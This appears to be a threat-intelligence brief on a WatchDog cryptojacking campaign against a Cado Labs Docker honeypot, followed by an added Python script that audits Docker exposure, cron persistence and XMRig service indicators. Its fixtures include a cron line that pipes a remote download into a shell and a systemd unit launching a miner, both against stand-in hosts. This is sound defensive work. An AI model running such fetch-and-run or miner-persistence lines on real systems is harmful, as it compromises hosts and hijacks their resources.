2022-06-07

Cryptojacking Group WatchDog Attacks Cado Labs

Level: Tactical | Source: Cado Security
Cybersecurity
Information & Technology

Researchers at Cado Labs report a cryptojacking attack observed against the company's honeypot. The attack is attributed to the cryptojacking group WatchDog, a rival of TeamTNT, another known threat actor targeting cloud environments. The campaign began by exploiting a publicly exposed, misconfigured Docker API on port 2375: the default setting had been left unsecured, allowing unauthenticated access to the Docker daemon. Once a foothold was established, the attacker created a new Alpine Linux Docker container and set up persistence with a cron job. The attacker then executed a shell script that checks whether the system is already infected, lists running processes and host configuration, downloads a second-stage payload, and verifies user permissions, since root is required for the rest of the campaign. The second-stage shell script manipulates the system's timestamps and disables services such as the Alibaba Cloud Agent. The XMRig miner payload is then dropped on the compromised host, with a system service created for persistence. A third-stage payload performs network scanning to identify hosts to pivot to and drops two final scripts that propagate the attack further into the victim's network.
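The summary above names three defender-relevant artifacts: a Docker daemon reachable over TCP 2375 without authentication, cron-based persistence, and a system service that launches the XMRig miner. The following Python script is an added example written for this page, not code from Cado Security or from the WatchDog tooling; it audits constructed copies of a Docker daemon.json, a crontab and a systemd unit for those three conditions. The TLS-related daemon.json keys are real Docker settings; the download-and-execute cron pattern, the unit file contents, the IP address and the pool hostname are assumptions constructed for the example.

```python
"""Audit Docker exposure and miner persistence indicators from the report.

All inputs below are constructed samples, not data from the incident.
"""
import json
import re
from pathlib import PurePosixPath
from urllib.parse import urlparse

# Constructed: a daemon.json with the unsecured default the report describes,
# and a hardened counterpart that requires TLS client certificates.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

# Constructed crontab: one benign entry, one download-and-execute entry
# (documentation IP range, assumed pattern for second-stage fetch).
CRONTAB = """0 3 * * * /usr/bin/certbot renew --quiet
*/15 * * * * curl -fsSL http://198.51.100.23/init.sh | sh"""

# Constructed systemd unit whose ExecStart runs an XMRig binary.
UNIT_FILE = """[Unit]
Description=System Monitor
[Service]
ExecStart=/usr/lib/systemd/xmrig -o pool.example.invalid:3333
Restart=always
[Install]
WantedBy=multi-user.target"""

DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash)\b")


def docker_api_exposure(daemon_json: str) -> list[str]:
    """Flag TCP listeners when tlsverify is not enabled (unauthenticated API)."""
    cfg = json.loads(daemon_json)
    tls_verify = bool(cfg.get("tlsverify", False))
    findings = []
    for host in cfg.get("hosts", []):
        parsed = urlparse(host)
        if parsed.scheme == "tcp" and not tls_verify:
            findings.append(f"Docker API on {host} without TLS client verification")
    return findings


def cron_download_exec(crontab: str) -> list[str]:
    """Return crontab lines that pipe a remote download straight into a shell."""
    return [line for line in crontab.splitlines() if DOWNLOAD_EXEC.search(line)]


def systemd_miner_units(unit_text: str) -> list[str]:
    """Return ExecStart binaries whose name contains 'xmrig'."""
    findings = []
    for line in unit_text.splitlines():
        key, sep, value = line.strip().partition("=")
        if sep and key == "ExecStart" and value.split():
            binary = value.split()[0]
            if "xmrig" in PurePosixPath(binary).name.lower():
                findings.append(binary)
    return findings


def audit(daemon_json: str, crontab: str, unit_text: str) -> dict:
    """Combine the three checks into one report keyed by indicator type."""
    return {
        "docker_exposure": docker_api_exposure(daemon_json),
        "cron_persistence": cron_download_exec(crontab),
        "miner_services": systemd_miner_units(unit_text),
    }


if __name__ == "__main__":
    print(json.dumps(audit(WEAK_DAEMON_JSON, CRONTAB, UNIT_FILE), indent=2))
    print(json.dumps(audit(HARDENED_DAEMON_JSON, "", ""), indent=2))
```

Run against a real host, the daemon.json check should be paired with a listening-socket check (the daemon may also be started with `-H tcp://...` on the command line), and the cron and unit checks should cover every user crontab and every systemd unit directory rather than a single file.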
